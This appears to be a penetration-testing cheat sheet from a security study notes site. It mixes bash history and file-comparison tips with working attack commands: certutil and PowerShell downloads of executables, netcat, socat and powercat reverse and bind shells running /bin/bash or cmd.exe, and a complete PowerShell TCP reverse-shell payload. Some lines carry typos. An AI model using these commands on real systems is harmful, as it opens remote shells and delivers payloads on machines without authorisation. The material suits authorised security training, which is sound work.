Important Commands

Download while we can use wget or curl to grab files, there's another tool called axel ie multipart download which speeds up large downloads considerably axel -a -n 20 -o file.ext http://host/file.ext

Download using certutil

certutil -rulcache -f http://10.0.0.1/download/jsextension.exe jsextension.exe

History ignore duplicates and or spaces export HISTCONTROL=ignoredups

commands that are run frequently export HISTIGNORE="&:ls:[bf]g:exit:history"

History Timeformat export HISTTIMEFORMAT='%F %T '

File Comparison

File comparison comm - compares 2 text files comm scan-a.txt scan-b.txt

it outputs lines that are shared by both - in last column the first column printed last is the difference

exclude certain line(s) comm -12 scan-a.txt scan-b.txt

diff - shared many output formats context format -c unified format -u

vimdiff (show 2 columns) Tail

output last 2 lines using tail tail -n2 /var/log/apache.log

aliases are useful replacing cmds with a shorter command we define alias lsa='ls -la'

Bash /etc/bash.bashrc [system wide bash settings for any user when logged in]

Netcat

nc -v -n ip port nc -nvlp 5555

transfer files with netcat nc -nlvp 4444 > file.exe remote side: nc -nv ip 4444 < /location_of_file

bind nc -nlvp 4444 -e cmd.exe nv -nv ip 4444

reverse nc -nv ip 4444 -e /bin/bash nc -nlvp 4444

Socat

socat - TCP4:ip:port Listener sudo socat TCP4-LISTEN:443 STDOUT Reverse sh Listener: socat -d -d TCP4-LISTEN:443 STDOUT socat TCP4:ip:port EXEC:/bin/bash

sudo socat OPENSSL-LISTEN:443,cert=bind_shell.pem,verify=0,fork EXEC=/bin/bash socat - OPENSSL:ip:port,verify=0

Powershell set-executionpolicy unrestricted

Get-ExecutionPolicy transfering file: Powershell -c "(new-object System.Net.Webclient).DownloadFile('http://ip/wget.exe','C:\temp\wget.exe')"

Shell:

$client = New-Object System.Net.Sockets.TCPClient("10.10.10.10",80); $stream = $client.GetStream(); [byte[]]$bytes = 0..65535|%{0}; while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0) {; $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i); $sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> "; $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush(); } $client.Close();

Bind shell:

$client = New-Object System.Net.Sockets.TCPClient("192.168.254.1",4444);$stream = $client.GetStream();[byte[]]$bytes = 0..255|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

Powercat

Basically the powershell version of netcat and simplifies the creation of bind & reverse shells.

File transfer

powercat -c ip -p 443 -i c:\location\powercat.ps1

Simple reverse shell:

powercat -c ip - p 443 -e cmd.exe

nc -lvp 443

Powercat Bind shells:

powercat -l -p 443 -e cmd.exe

nc -nv ip 443

powercat standalone payloads:

powercat -c ip -p 443 -e cmd.exe -ge > reverse.ps1

powershell -E base64

PreviousKioptrix Level 1NextBash scripting

Last updated

Was this helpful?